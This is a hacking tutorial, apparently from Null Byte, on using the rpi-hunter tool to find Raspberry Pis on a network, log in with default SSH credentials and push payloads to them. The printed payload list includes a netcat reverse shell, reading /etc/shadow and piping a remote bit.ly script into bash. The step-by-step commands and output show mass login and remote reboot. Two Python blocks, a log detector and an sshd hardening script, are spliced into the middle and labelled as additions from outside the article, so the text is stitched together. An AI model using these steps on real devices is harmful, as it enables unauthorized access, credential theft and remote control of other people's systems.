
How to Discover and Attack Raspberry Pis Using Default Credentials with Rpi-Hunter « Null Byte :: WonderHowTo



When setting up a Raspberry Pi, it is easy to overlook changing the default password. Like many IoT devices, the Raspberry Pi's standard Raspbian operating system ships with a widely known default password, which leaves the device open to remote access. Using a tool called rpi-hunter, hackers can discover, log in to, and run custom payloads on any vulnerable Pi connected to the same network.

Although this tool is mainly intended for local networks, it can also discover and attack Pis that are connected directly to the internet anywhere. Far from a simple prank, a vulnerable Pi on your network can give hackers unauthorized access to other devices on your internal network, and even spread payloads to other vulnerable devices.

Why Default Credentials Are a Problem

Devices that still use default passwords are a major risk to any network they connect to. Because many IoT devices do not even let the owner change the password, thanks to hard-coded credentials, they are a favorite target for hackers and automated botnets. Hackers exploited these weaknesses in October 2016 and knocked out internet service in the United States with thousands of vulnerable computers enlisted in the Mirai botnet.

This botnet was built by scanning large blocks of the internet for open Telnet ports and trying to log in with default passwords to any device it discovered, taking over vulnerable devices and adding them to the botnet.

Apart from IoT devices, default credentials are also a significant problem in routers. Because most users plug in the device and never change its password, anyone with the Wi-Fi password can quickly get into the router's setup and administration portal. From there, it is easy to enable remote administration, load unauthorized firmware to spy on the owner, and make other unauthorized changes to the device, such as pointing its DNS setting at a malicious server.

If you know the default password a device uses, it is easy to automate logging in to the device to perform any kind of action. That is where rpi-hunter comes in. With it, we can use our knowledge of the Raspberry Pi's default password to automate discovering and controlling Pis remotely.

Rpi-Hunter for Good

If you have more than one Raspberry Pi, rpi-hunter can take the work out of keeping them updated. Once it has found the Pis on the network, it is easy to make changes to each device individually or to access every Pi at the same time as a group. While rpi-hunter is programmed by default to try the standard Raspbian password, you can easily change the password to match the one you used when setting up your own Raspberry Pis.

If you have a home or work network with Raspberry Pis you need to configure, you can connect them to the network, enable SSH, and make any changes you need to the entire group at once with rpi-hunter. You can run updates, change passwords, or pre-install software on the Pis that you may need all of them to run later. Being able to connect all your Pis to the network and issue commands to all of them at the same time is much more convenient than doing it one by one.

Rpi-Hunter for Evil

It doesn't take much imagination to guess how the ability to discover and control large groups of Raspberry Pis with default credentials could be abused. Aside from stock Raspbian, many Raspberry Pis are deployed as OctoPrint controllers or for other applications with well-known default passwords. If any of these devices are connected directly to the internet, rpi-hunter can discover them over the internet and start issuing commands.

The risk for the owner of a Raspberry Pi who forgets to change the password is that a stranger can control it remotely and potentially gain a beachhead from which to infect the rest of the network. The average user who sets up and forgets about a Raspberry Pi running default credentials may never see any symptoms of the device being compromised, even though it may be silently following instructions such as routing stolen credit card transactions through your network or spying on your traffic.

What You Need

To follow this guide, you must have a Raspberry Pi model such as the Zero W or 3 Model B+ running Raspbian or Debian. You can download this operating system for the Raspberry Pi from the Raspberry Pi Foundation's download page. Once you have your Raspberry Pi, you can connect it to your home network with an Ethernet cable (if the Pi has an Ethernet port) or over Wi-Fi.

Next, you need a computer with Python to run rpi-hunter on. Because Python is cross-platform, you should be able to install it from its download page on whatever operating system you are using.


Once you have installed Python and your computer is connected to the same network as your Raspberry Pi, you are ready to start using rpi-hunter.

Step 1: Get Rpi-Hunter Ready

First, we need to install some libraries rpi-hunter relies on to run. To do so, open a new terminal window and enter the following commands.

  sudo pip install -U argparse termcolor
  sudo apt -y install arp-scan tshark sshpass

Once these libraries are installed, we can continue by installing rpi-hunter from its GitHub repository. To clone the repo, type the following in a terminal window.

  git clone https://github.com/BusesCanFly/rpi-hunter.git
  cd rpi-hunter

Now we should be in the "rpi-hunter" folder (via the cd command), with the newly downloaded "rpi-hunter.py" ready for us to run.

Step 2: Enable SSH on Your Raspberry Pi

Connect your Raspberry Pi to the network via either an Ethernet cable or Wi-Fi, and make sure SSH is enabled. You can check this by running the command raspi-config in a terminal window, selecting "Interfacing Options," and then enabling remote command-line access to your Pi over SSH.

Once you have enabled SSH, save your settings. You may need to reboot. To check that SSH is running, type ifconfig in a terminal window on the Pi to get its IP address, and then run the following command from your other device.

  sudo nmap -p 22 <Pi's IP address here>

If the Nmap scan reports that the port is "open," SSH is listening on your Pi.

Step 3: Make Rpi-Hunter Executable

Before running it for the first time, we must make "rpi-hunter.py" executable by running the following command in a terminal window.

  chmod +x rpi-hunter.py

Step 4: Run Rpi-hunter

Now we should be able to run the program and see the different flags we can work with.

  sudo python rpi-hunter.py -h

usage: rpi-hunter.py

optional arguments:
  -h, --help         show this help message and exit
  --list             List available payloads
  --no-scan          Disable ARP scanning
  -r IP_RANGE        IP range to scan
  -f IP_LIST         IP list to use (Default ./scan/RPI_list)
  -c CREDS           Password to use when SSHing
  --payload PAYLOAD  (Name of, or raw) payload [ex. reverse_shell or 'whoami']
  -H HOST            (If using reverse_shell payload) Reverse shell host
  -P PORT            (If using reverse_shell payload) Reverse shell port
  --safe             Print the sshpass command, but don't run it
  -q                 Don't print banner or ARP scan output

Here we can see some useful flags right off the bat. We can scan a single host or a range of IP addresses with -r, or we can even draw from a list of IP addresses with the -f flag. There are some other options concerning which payload to choose, and we can explore the available payloads by typing the following command.

  sudo python rpi-hunter.py --list

Payloads:
Use with --payload <name>

[raincow_install] sudo apt -y install fortune cowsay lolcat
[motd] echo "CHANGE YOUR PASSWORD" > /etc/motd
[raincow_bashrc] sudo echo "fortune | cowsay | lolcat" >> ~/.bashrc
[reverse_shell] rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc None None >/tmp/f
[apt_update] sudo apt update && sudo apt -y upgrade
[shadow] sudo cat /etc/shadow
[rickroll] curl -s -L http://bit.ly/10hA8iC | bash
[gitpip] sudo apt -y install git python-pip

In the payload list, we can see that there are several options to choose from. We can change the message of the day, create a reverse shell to control the Pi remotely, or even write our own custom payload to send.

Step 5: Discover the Raspberry Pis on the Network

To discover a Raspberry Pi on the network, rpi-hunter runs a series of scans to identify which devices are listed as manufactured by Raspberry Pi. We could run a scan first and then enter the IP address ourselves if we wanted to be precise, but the point here is the ability to discover and control devices on the network that you otherwise wouldn't know about.

Without knowing anything about the network we are on, rpi-hunter will scan the entire network range for Raspberry Pi devices, add them to a list, and then send a payload to any device running default credentials. We can do this with the whoami payload using the following command. I ran mine without first connecting the Pi to the network. (Note: You can also scan a specific IP range by adding the -r flag and the range before the payload.)

  sudo python rpi-hunter.py --payload whoami

Interface: wlp1s0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan)
172.16.42.1  de:f3:86:ec:ca:a0  (Unknown)
172.16.42.3  60:30:d4:6a:06:c8  (Unknown)
172.16.42.27  b0:19:c6:98:72:ee  (Unknown)
172.16.42.24  1c:36:bb:00:bd:84  (Unknown)
172.16.42.85  8c:85:90:3a:77:14  (Unknown)
172.16.42.15  30:59:b7:08:b2:86  Microsoft
172.16.42.102  8c:85:90:c4:45:08  (Unknown)
172.16.42.117  00:26:bb:1b:97:72  Apple, Inc.
172.16.42.121  8c:85:90:0c:a6:e6  (Unknown)
172.16.42.138  18:65:90:e0:3e:03  (Unknown)
172.16.42.122  d0:c5:f3:9a:eb:2b  (Unknown)
172.16.42.35  10:4a:7d:39:ea:e0  Intel Corporate
172.16.42.75  40:4e:36:3b:63:bf  HTC Corporation
172.16.42.80  34:23:87:e4:41  Hon Hai Precision Ind. Co., Ltd.
172.16.42.95  3c:2nd:f9:bb:87:ad  (Unknown)
172.16.42.105  88:e9:fe:87:c7:74  (Unknown)
172.16.42.112  c4:b3:01:bc:ab:e7  Apple, Inc.
172.16.42.115  36:26:1f:e8:1f:63  (Unknown)
172.16.42.169  a8:bb:cf:13:42:6th  Apple, Inc.
172.16.42.179  8c:85:90:81:9a:9b  (Unknown)
172.16.42.141  8c:85:90:c3:var:3e  (Unknown)
172.16.42.123  a4:34:d9:3f:b3:30  Intel Corporate
172.16.42.164  b8:e8:56:12:84:36  Apple, Inc.

23 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.5: 256 hosts scanned in 2.571 seconds (99.57 hosts/sec). 23 responded

Located 0 Raspi(s)

Loaded 0 IPs

Sending payload to Pis
Godspeed, little payload

As you can see from the output, zero Raspberry Pis were detected on the network we are on. If there had been one, we should see a response from the Raspberry Pi that simply says "pi" in reply to the whoami command.

Step 6: Send a Standard Payload

Now, let's go ahead and send one of the standard payloads included in the script to a live Raspberry Pi. Let's use the motd payload, which changes the Pi's "message of the day" that appears when a user logs in over SSH. (Note: If you already have a Pi you want to target, add the -r flag and its IP address before the payload.)

When we run this, the script will connect over SSH to every Pi it has discovered using the default credentials, and then add "CHANGE YOUR PASSWORD" to the message-of-the-day text shown at login.

  sudo python rpi-hunter.py --payload motd

Interface: wlp1s0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan)
172.16.42.1  de:f3:86:ec:ca:a0  (Unknown)
172.16.42.15  30:59:b7:08:b2:86  Microsoft
172.16.42.24  1c:36:bb:00:bd:84  (Unknown)
172.16.42.48  b4:9c:df:c1:27:5d  (Unknown)
172.16.42.85  8c:85:90:3a:77:14  (Unknown)
172.16.42.75  40:4e:36:3b:63:bf  HTC Corporation
172.16.42.80  34:23:87:e4:41  Hon Hai Precision Ind. Co., Ltd.
172.16.42.169  a8:bb:cf:13:42:6th  Apple, Inc.
172.16.42.121  8c:85:90:0c:a6:e6  (Unknown)
172.16.42.182  f4:5c:89:99:57:13  Apple, Inc.
172.16.42.102  8c:85:90:c4:45:08  (Unknown)
172.16.42.97  a4:b8:05:66:a0:64  Apple, Inc.
172.16.42.122  d0:c5:f3:9a:eb:2b  (Unknown)
172.16.42.130  90:61:ae:8f:f4:03  (Unknown)
172.16.42.127  4c:66:41:77:66:37  SAMSUNG ELECTRO-MECHANICS (THAILAND)
172.16.42.98  78:4f:43:59:7b:fb  Raspberry Pi
172.16.42.112  c4:b3:01:bc:ab:e7  Apple, Inc.

21 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.5: 256 hosts scanned in 2.538 seconds (100.87 hosts/sec). 17 responded

Located 1 Raspi(s)

Loaded 1 IP

Sending payload to Pis
Godspeed, little payload

Sending payload to 172.16.42.98

Success! The next time we log in to our Raspberry Pi over SSH, we should see the message "CHANGE YOUR PASSWORD" added.
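On the receiving end, a payload delivered this way leaves a distinctive trail in the Pi's /var/log/auth.log: a password-based (not key-based) SSH login as the default pi account, followed by a sudo command run without a TTY. The following Python is an added defender-side example, not part of the article or of rpi-hunter; the log lines it parses are constructed samples, and the patterns follow the standard OpenSSH and sudo syslog formats.

```python
import re
from collections import defaultdict

# Constructed sample of /var/log/auth.log lines from a Raspbian host (not taken from the article).
# The third line and the sudo line are what a one-shot "ssh pi@host 'sudo ...'" delivery looks like.
SAMPLE_AUTH_LOG = """\
Mar  3 10:01:02 raspberrypi sshd[1201]: Accepted publickey for pi from 172.16.42.12 port 50110 ssh2: ED25519 SHA256:AbCdEf
Mar  3 10:05:44 raspberrypi sshd[1290]: Failed password for pi from 172.16.42.50 port 44120 ssh2
Mar  3 10:05:45 raspberrypi sshd[1292]: Accepted password for pi from 172.16.42.50 port 44122 ssh2
Mar  3 10:05:46 raspberrypi sshd[1292]: pam_unix(sshd:session): session opened for user pi by (uid=0)
Mar  3 10:05:47 raspberrypi sudo:       pi : TTY=unknown ; PWD=/home/pi ; USER=root ; COMMAND=/bin/sh -c echo "CHANGE YOUR PASSWORD" > /etc/motd
Mar  3 10:05:50 raspberrypi sshd[1292]: Disconnected from user pi 172.16.42.50 port 44122
"""

# Standard OpenSSH and sudo syslog formats.
SSHD_RE = re.compile(r"sshd\[\d+\]: (?P<result>Accepted|Failed) (?P<method>[\w/-]+) for (?:invalid user )?"
                     r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+")
SUDO_RE = re.compile(r"sudo:\s+(?P<user>\S+) : TTY=(?P<tty>\S+) .* COMMAND=(?P<cmd>.*)$")

DEFAULT_ACCOUNTS = {"pi"}  # stock Raspbian login; extend for other images with known defaults
# sshpass can satisfy either of these; with ChallengeResponseAuthentication enabled sshd logs the second.
PASSWORD_METHODS = {"password", "keyboard-interactive/pam"}

def find_default_cred_logins(lines, default_accounts=DEFAULT_ACCOUNTS):
    """Return {source_ip: count} of successful password-style logins to default accounts.
    Key-based logins are ignored: rpi-hunter drives sshpass, so its logins are never key logins."""
    hits = defaultdict(int)
    for line in lines:
        m = SSHD_RE.search(line)
        if m and m["result"] == "Accepted" and m["method"] in PASSWORD_METHODS and m["user"] in default_accounts:
            hits[m["ip"]] += 1
    return dict(hits)

def find_non_interactive_sudo(lines):
    """Return sudo commands run with TTY=unknown, i.e. from a non-interactive SSH command rather than a shell."""
    return [m["cmd"] for m in map(SUDO_RE.search, lines) if m and m["tty"] == "unknown"]

if __name__ == "__main__":
    lines = SAMPLE_AUTH_LOG.splitlines()
    print("password logins to default accounts:", find_default_cred_logins(lines))
    print("TTY-less sudo commands:", find_non_interactive_sudo(lines))
```

On a real Pi, feed it the output of `journalctl -u ssh` or the auth.log file instead of the sample; a burst of such logins from one source across several Pis is the signature of a tool like this one.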

Step 7: Send a custom payload

Now that we can send payloads, let's go beyond the standard payloads contained in the script and use a simple custom payload. To do this, we can put the commands we want to send to the Pi in quotation marks after the --payload flag. To reboot every Pi we discover, we can send the command sudo reboot as our payload. The command looks like this:

  sudo python rpi-hunter.py --payload "sudo reboot"

Located 1 Raspi(s)

Loaded 1 IP

Sending payload to Pis
Godspeed, little payload

Sending payload to 172.16.42.98
Connection to 172.16.42.98 closed by remote host.

After issuing this command, every Raspberry Pi on the network should reboot immediately. If any Pi uses a password other than the default Raspbian password, you can change the password rpi-hunter attempts with the -c flag.

Accessing Pis with a password other than the default can be done by running the following command in a terminal window, with the Pi's password in place of "toor".

  sudo python rpi-hunter.py -c toor --payload "sudo reboot"

Now that you can change both the password that is sent and customize your payload, rpi-hunter is ready to control any Pi or group of Pis remotely.

Rpi-Hunter Lets You Control Many Pis at Once

Devices with default credentials are easily accessible, and rpi-hunter is a powerful and useful proof of concept that shows how easy it is to take over a large number of vulnerable devices at once. Be sure to change the default password on any device you connect to your network, and never expose devices with default credentials to the internet.

If you are worried about someone else accessing your Raspberry Pi, turn off SSH when you don't need it, and consider using a key file rather than a simple passphrase to secure SSH access to your device.
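The advice above amounts to making the default password useless over SSH. The Python below is an added example, not from the article or from rpi-hunter: it audits a stock-style sshd_config fragment for directives left at sshd's permissive defaults and rewrites it to key-only authentication. The directive names are real OpenSSH keywords; the config fragment itself is constructed for the example.

```python
import re

# Constructed stock-style /etc/ssh/sshd_config fragment (not from the article): the password
# directives are still commented out, so sshd's compiled-in defaults apply.
STOCK_SSHD_CONFIG = """\
Port 22
#PermitRootLogin prohibit-password
#PubkeyAuthentication yes
#PasswordAuthentication yes
#PermitEmptyPasswords no
ChallengeResponseAuthentication no
UsePAM yes
"""

# Directive -> hardened value. A commented-out directive is not set; sshd then falls back to its
# default, and for PasswordAuthentication that default is "yes", which is what rpi-hunter relies on.
WANTED = {
    "PasswordAuthentication": "no",            # key-only: the default "raspberry" password is useless over SSH
    "PubkeyAuthentication": "yes",
    "PermitRootLogin": "no",
    "PermitEmptyPasswords": "no",
    "ChallengeResponseAuthentication": "no",   # otherwise PAM can still prompt for the password
}

def effective_settings(config_text):
    """Active (uncommented) directives; sshd honours the first occurrence of each keyword."""
    settings = {}
    for line in config_text.splitlines():
        m = re.match(r"\s*([A-Za-z]+)\s+(\S+)", line)
        if m and not line.lstrip().startswith("#"):
            settings.setdefault(m.group(1), m.group(2))
    return settings

def audit_sshd_config(config_text):
    """Wanted directives not explicitly set to the hardened value (unset ones use sshd's default)."""
    active = effective_settings(config_text)
    return {k: active.get(k, "<unset: sshd default>") for k, v in WANTED.items() if active.get(k) != v}

def harden_sshd_config(config_text):
    """Prepend the wanted directives (first occurrence wins) and comment out existing active
    occurrences so nothing later in the file can override them. Match blocks are not modelled."""
    out = []
    for line in config_text.splitlines():
        m = re.match(r"\s*([A-Za-z]+)\s", line)
        if m and m.group(1) in WANTED and not line.lstrip().startswith("#"):
            line = "#" + line
        out.append(line)
    return "\n".join(f"{k} {v}" for k, v in WANTED.items()) + "\n" + "\n".join(out) + "\n"
```

Install your public key in ~/.ssh/authorized_keys and confirm a key login works before applying the hardened file, then restart sshd; otherwise you lock yourself out along with everyone else.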

I hope you enjoyed this guide to finding and pushing payloads to Raspberry Pis over a network with rpi-hunter! If you have any questions about this guide to remote access to Raspberry Pis, leave a comment below, and feel free to reach me on Twitter @KodyKinzie.


Cover image by Kody/Null Byte



